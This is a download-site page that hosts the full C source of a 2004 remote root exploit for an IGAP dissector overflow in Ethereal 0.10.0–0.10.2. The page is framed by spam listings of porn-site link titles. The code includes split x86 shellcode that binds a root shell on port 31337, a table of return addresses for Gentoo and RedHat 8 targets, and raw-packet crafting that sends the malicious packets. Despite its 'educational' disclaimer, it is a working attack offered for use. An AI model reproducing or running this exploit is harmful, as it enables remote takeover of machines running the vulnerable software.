亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? ethereal 0.10.0-0.10.2 igap overflow remote root exploit.txt

?? 一些可以實現(xiàn)益出的程序
?? TXT
字號:
/* 
 * THE EYE ON SECURITY RESEARCH GROUP - INDIA
 * Ethereal IGAP Dissector Message Overflow Remote Root exploit
 *
 * Copyright 2004 - EOS-India Group
 *
 * Authors note:
 * Shellcode splitting technique:
 * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
 * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
 * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
 * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode 
 * requires EBP to contain a usuable stack address, we overwrite saved EBP also.
 *
 * Disclaimer:
 * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
 * be held responsible for any damage caused due to misuse of this code.
 * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
 * Ethereal 0.10.2.
 *
 * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
 * http://www.eos-india.net
 *
*/
#define IPPROTO_IGAP    0x02 // IPPROTO_IGMP=0x02     
#define PAYLOAD_SIZE    (255-64)    
#define MAX_BUFF    sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP        "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER        "0.2"
#define SOCKET_ERROR    -1
#define MAX_PACKET    10
#define RETOFFSET     76 
#define SRC_IP        "192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>

#define MAX_ARCH    5
struct eos{
    char *arch;
    unsigned long ret;
} targets[] = {
    "tEthereal(0.10.2)-Gentoo(gdb)",
    0xbffede50,
    //-------------------------------
    "tEthereal(0.10.2)-Gentoo     ",
    0xbffede10,
    //-------------------------------
    "Ethereal(0.10.2)-Gentoo      ",
    0xbfffd560,
    //-------------------------------
    "tEthereal(0.10.2)-RedHat 8   ",
    0xbffedfb8,
    //-------------------------------
    "Ethereal(0.10.2)-RedHat 8    ",
    0xbfffcd08,
    //-------------------------------
    NULL,
    0
};
    

/*
 x86 linux portbind a shell in port 31337
 based on shellcode from www.shellcode.com.ar
 with a few modifications by us
*/
 
char shellcode_firsthalf[]=
        /* sys_fork() */
    "\x31\xc0"                      // xorl         %eax,%eax
    "\x31\xdb"                      // xorl         %ebx,%ebx
    "\xb0\x02"                      // movb         $0x2,%al
    "\xcd\x80"                      // int          $0x80
    "\x38\xc3"                      // cmpl         %ebx,%eax
    "\x74\x05"                      // je           0x5
    /* sys_exit() */
    "\x8d\x43\x01"                  // leal         0x1(%ebx),%eax
    "\xcd\x80"                      // int          $0x80
        /* setuid(0) */
        "\x31\xc0"                      // xorl         %eax,%eax
        "\x31\xdb"                      // xorl         %ebx,%ebx
        "\xb0\x17"                      // movb         $0x17,%al
        "\xcd\x80"                      // int          $0x80
        /* socket() */
        "\x31\xc0"                      // xorl    %eax,%eax
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
        "\x40"                          // incl    %eax
        "\x89\xc3"                      // movl    %eax,%ebx(SYS_SOCKET = 0x1)
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
        "\x40"                          // incl    %eax
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)(AF_INET = 0x2)
    "\x8d\x4d\x08"                  // leal    0x8(%ebp),%ecx
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\x45\x08"                  // movl    %eax,0x8(%ebp)
    ;    
char jumpcode[]="\xeb\x10";

char shellcode_secondhalf[]=
        /* bind()*/
        "\x43"                          // incl    %ebx(SYS_BIND = 0x2)
        "\x66\x89\x5d\x14"              // movw    %bx,0x14(%ebp)(AF_INET = 0x2)
    "\x66\xc7\x45\x16\x7a\x69"      // movw    $0x697a,0x16(%ebp)(port=31337)
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x89\x55\x18"                  // movl    %edx,0x18(%ebp)
        "\x8d\x55\x14"                  // leal    0x14(%ebp),%edx
        "\x89\x55\x0c"                  // movl    %edx,0xc(%ebp)
        "\xc6\x45\x10\x10"              // movb    $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* listen() */
        "\x40"                          // incl    %eax
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x43"                          // incl    %ebx
        "\x43"                          // incl    %ebx(SYS_LISTEN = 0x4)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
 
        /* accept() */
        "\x43"                          // incl    %ebx
        "\x89\x45\x0c"                  // movl    %eax,0xc(%ebp)
        "\x89\x45\x10"                  // movl    %eax,0x10(%ebp)
        "\xb0\x66"                      // movb    $0x66,%al
        "\xcd\x80"                      // int     $0x80
        "\x89\xc3"                      // movl    %eax,%ebx
 
        /* dup2() */
        "\x31\xc9"                      // xorl    %ecx,%ecx
        "\xb0\x3f"                      // movb    $0x3f,%al
        "\xcd\x80"                      // int     $0x80
        "\x41"                          // incl    %ecx
        "\x80\xf9\x03"                  // cmpb    $0x3,%cl
        "\x75\xf6"                      // jne     -0xa
 
        /* execve() */
        "\x31\xd2"                      // xorl    %edx,%edx
        "\x52"                          // pushl   %edx
        "\x68\x6e\x2f\x73\x68"          // pushl   $0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // pushl   $0x69622f2f
        "\x89\xe3"                      // movl    %esp,%ebx
        "\x52"                          // pushl   %edx
        "\x53"                          // pushl   %ebx
        "\x89\xe1"                      // movl    %esp,%ecx
        "\xb0\x0b"                      // movb    $0xb,%al
        "\xcd\x80";                     // int     $0x80
 
struct ipheader {
    unsigned char ip_hl:4, ip_v:4; 
    unsigned char ip_tos;
    unsigned short int ip_len;
    unsigned short int ip_id;
    unsigned short int ip_off;
    unsigned char ip_ttl;
    unsigned char ip_proto;
    unsigned short int ip_sum;
    unsigned int ip_src;
    unsigned int ip_dst;
};

struct igap_header {         // This is a malformed header which does not conforms with IGAP RFC
    unsigned char igap_type;     // Message Type
    unsigned char igap_restime;     // Response Time
    unsigned short int igap_cksum;     // IGAP Message Checksum
    unsigned int igap_gaddr;     // Group Address
    unsigned char igap_ver;     // Version
    unsigned char igap_stype;    // SubType
    unsigned char igap_reserved1;    // Reserved
    unsigned char igap_cid;        // Challenge ID
    unsigned char igap_asize;    // Account Size
    unsigned char igap_msgsize;    // Message Size
    unsigned short int igap_reserved2;    // Reserved
    /*
    unsigned char igap_uaccount[16];// User Account
    unsigned char igap_message[64]    // Message
    */
    unsigned char igap_payload[16+64+PAYLOAD_SIZE];    
// This buffer will contain payload, here we differ from RFC by sending a bigger message.
};

unsigned short checksum(unsigned short *buf,int nwords)
{
    unsigned long sum;
    for (sum = 0; nwords > 0; nwords--)
        sum += *(buf)++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

void showhelp(char *pr00gie) {
    int i=0;
    printf("######### The Eye on Security Research Group - India ########\n");
    printf("%s %s\n",EXP,VER);
           printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
           printf("http://www.eos-india.net\n\n");
    printf("[usage]\n");
    printf("%s [Remote Host] [Target]\n",pr00gie);
    printf("[Available Targets]\n");
    while(targets[i].arch != NULL) {
        printf("%d. - %s\t - %p\n",(i),targets[i].arch,targets[i].ret);
        i++;
    }
    exit(1); 
}
          
int main(int argc,char *argv[]) {
    char buffer[MAX_BUFF];
    struct ipheader *iphdr=(struct ipheader*)buffer;
    struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
    int sockfd;
    unsigned long addr;
    int one=1;
    int i;
    const int *val=&one;
    struct sockaddr_in sin;
    unsigned long magic;
    unsigned int n;
    
    if(getuid()) {
        printf("- This code opens SOCK_RAW which needs root privilege\n");
        exit(1);
    }
    if(argc != 3)
        showhelp(argv[0]);
    n=atoi(argv[2]);
    if(n >= MAX_ARCH) {
        printf("- Invalid target\n");
        showhelp(argv[0]);
    }
    magic=targets[n].ret;
    printf("-Using RET %p\n",magic);
    addr=inet_addr(argv[1]);
    if(addr==INADDR_NONE) {
        printf("- Invalid target\n");
        exit(1);
    }
    sin.sin_addr.s_addr=addr;
    sin.sin_family=AF_INET;
    sin.sin_port=0x00;
    sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
    if(sockfd==SOCKET_ERROR) {
        printf("- Failed creating SOCK_RAW descriptor\n");
        exit(1);
    }
    if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)
        printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");
    memset(buffer,0x00,MAX_BUFF);
    // Filling IP Header
    iphdr->ip_hl=0x05;
    iphdr->ip_v=0x04;
    iphdr->ip_tos=0x00;
    iphdr->ip_len=MAX_BUFF;
    iphdr->ip_id=htonl(54321);
    iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
    iphdr->ip_ttl=0x01;
    iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
    iphdr->ip_sum=0x00; // Fill sum before sending packet
    iphdr->ip_src=inet_addr (SRC_IP); 
    iphdr->ip_dst=addr;
    // Filling IGAP Header
    igaphdr->igap_type=0x41; // IGAP Membership Query
    igaphdr->igap_restime=0x0a; // 
    igaphdr->igap_cksum=0x00; // compute before sending packet
    igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
    igaphdr->igap_ver=0x01; // IGAPv1
    igaphdr->igap_stype=0x21; // Basic Query
    igaphdr->igap_reserved1=0x00; // Ignored
    igaphdr->igap_cid=0x00; 
    // Challenge ID (ignored because Chanllenge Response authentication not used)        
    igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
    igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; //  Size of Message    
    igaphdr->igap_reserved2=0x00; // Reserved
    // Building exploit buffer
    //for(i=0;i<16+64+PAYLOAD_SIZE;i++)
    //    memset(igaphdr->igap_payload+i,(unsigned char)i,1);
    memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
    memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
    strlen(shellcode_firsthalf));
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);
    magic-=0x10;
    memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);
    memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
                shellcode_secondhalf,strlen(shellcode_secondhalf));
    // Calculating checksum
    igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
    (sizeof(struct igap_header))>>1);
    iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
    // Sending
    one=MAX_PACKET;
    while(one) {
        sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));
        printf(".");
        one--;
    }
    close(sockfd); 
    printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);    
    printf("- Read source to know what to do to check if the exploit worked\n");
    return 0;
}

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
日韩**一区毛片| 一本色道a无线码一区v| 成人一级片网址| 精品视频一区二区三区免费| 欧美不卡123| 亚洲综合免费观看高清在线观看 | 欧美一区二区三区视频在线| 国产无遮挡一区二区三区毛片日本| 亚洲免费在线观看视频| 激情综合网激情| 欧美日韩另类一区| 亚洲欧美电影院| 高清在线不卡av| 日韩你懂的在线播放| 一区二区三区高清| 成人蜜臀av电影| 国产日韩欧美精品综合| 日本伊人精品一区二区三区观看方式| 99久久国产综合精品色伊| 2020国产精品久久精品美国| 婷婷综合在线观看| 欧美四级电影在线观看| 蜜桃av一区二区三区电影| 日本福利一区二区| 亚洲人成伊人成综合网小说| 国产一区二区三区不卡在线观看| 欧美三级在线视频| 一区二区三区美女| 91麻豆精品秘密| 成人免费一区二区三区在线观看| 国产成人精品亚洲日本在线桃色| 日韩欧美国产三级| 美女诱惑一区二区| 日韩三级电影网址| 日本不卡中文字幕| 欧美一区二区三区小说| 视频一区在线视频| 91精品国产乱| 久久精品国产在热久久| 欧美一级夜夜爽| 精品在线播放免费| 久久综合中文字幕| 国产91丝袜在线播放九色| 久久久.com| www.日韩在线| 亚洲美女视频一区| 欧美性大战久久| 日韩国产精品久久| 精品国产污污免费网站入口 | 2023国产精品| 国产a区久久久| 自拍偷自拍亚洲精品播放| zzijzzij亚洲日本少妇熟睡| 亚洲免费成人av| 91久久一区二区| 丝袜美腿亚洲色图| 精品欧美黑人一区二区三区| 国产成人综合网| 亚洲欧洲精品一区二区三区 | 亚洲卡通欧美制服中文| 欧美怡红院视频| 蜜桃久久av一区| 成人欧美一区二区三区1314 | 日韩一区二区三免费高清| 国产精品综合在线视频| 亚洲欧美在线aaa| 欧美巨大另类极品videosbest| 免费av成人在线| 国产清纯白嫩初高生在线观看91 | 欧美日韩高清在线播放| 久久国产成人午夜av影院| 亚洲国产精品传媒在线观看| 91美女蜜桃在线| 免费精品99久久国产综合精品| 久久精品免视看| 欧美日韩另类国产亚洲欧美一级| 精品中文字幕一区二区| 亚洲欧美另类久久久精品| 欧美一区二区三区视频| gogo大胆日本视频一区| 青草国产精品久久久久久| 中文字幕av不卡| 在线不卡的av| 91官网在线观看| 国产99久久久久| 美腿丝袜亚洲综合| 亚洲精品国产成人久久av盗摄| 精品国内二区三区| 欧美日韩高清影院| 色婷婷久久99综合精品jk白丝| 激情六月婷婷久久| 性做久久久久久久久| 亚洲视频在线一区二区| 久久精品视频在线免费观看| 国产精品视频一区二区三区不卡| 欧美色网站导航| av一区二区三区四区| 国产毛片精品视频| 美国十次了思思久久精品导航| 亚洲精品网站在线观看| 国产精品毛片无遮挡高清| 精品美女在线播放| 欧美丰满美乳xxx高潮www| 亚洲r级在线视频| 久久久不卡网国产精品二区| 日韩免费高清av| 欧美怡红院视频| 成人午夜精品在线| 蜜桃精品在线观看| 蜜桃av噜噜一区| 亚洲一区二区五区| 国产精品久久久久久久久免费桃花 | 懂色av一区二区在线播放| 丝袜亚洲精品中文字幕一区| 亚洲欧美综合另类在线卡通| 欧美电影免费观看高清完整版| 色综合天天综合网国产成人综合天 | 亚洲一级片在线观看| 久久午夜免费电影| 6080yy午夜一二三区久久| 91免费视频观看| 成年人午夜久久久| 91免费在线播放| 国产aⅴ综合色| 国产成人av一区二区三区在线 | 91啪在线观看| 成人av免费在线观看| 黑人精品欧美一区二区蜜桃| 国产精品成人免费精品自在线观看| 中文av字幕一区| 欧美经典三级视频一区二区三区| 精品少妇一区二区三区免费观看| 91精品国产综合久久久久久久 | 亚洲人成人一区二区在线观看| 国产免费观看久久| 亚洲国产成人在线| 伊人婷婷欧美激情| 一区二区三区国产豹纹内裤在线| 国产精品福利一区二区| 国产精品女同互慰在线看| 国产精品久久久久久久久搜平片| 国产精品午夜在线观看| 欧美国产97人人爽人人喊| 国产精品天干天干在观线| 欧美国产欧美亚州国产日韩mv天天看完整 | 91免费小视频| 日本韩国欧美三级| 欧美亚洲综合久久| 欧美精品粉嫩高潮一区二区| 欧美日韩亚洲综合一区二区三区 | 国产99久久久久久免费看农村| 国产精品白丝jk黑袜喷水| 91色婷婷久久久久合中文| 色94色欧美sute亚洲线路二| 欧美日韩在线免费视频| 91精品在线观看入口| 精品少妇一区二区三区在线视频 | 亚洲女性喷水在线观看一区| 国产精品久久福利| 一区二区三区欧美日韩| 亚洲色图制服丝袜| 午夜久久久久久久久| 成人av资源站| 欧美日韩一级黄| 久久九九影视网| 亚洲伦在线观看| 亚洲一区中文在线| 国产成人综合在线| 日本韩国欧美国产| 精品国精品自拍自在线| 自拍偷拍欧美精品| 蜜桃av噜噜一区| 久久国产乱子精品免费女| 99国产精品视频免费观看| 在线综合+亚洲+欧美中文字幕| 久久亚洲精华国产精华液| 亚洲欧美激情小说另类| 国产成人在线视频网站| 欧美亚一区二区| 久久久久久免费毛片精品| 亚洲一区电影777| 国内精品嫩模私拍在线| 欧美日韩一卡二卡三卡 | 国产色产综合产在线视频| 三级亚洲高清视频| 成人av资源下载| 日韩欧美不卡在线观看视频| 国产精品久久福利| 蜜臂av日日欢夜夜爽一区| 91在线你懂得| 精品成人在线观看| 性欧美疯狂xxxxbbbb| av亚洲精华国产精华精华| 国产女人水真多18毛片18精品视频| 亚洲国产精品一区二区久久| 成人深夜在线观看| 日韩女优av电影| 亚洲精品videosex极品| 色婷婷久久99综合精品jk白丝| 国产色婷婷亚洲99精品小说|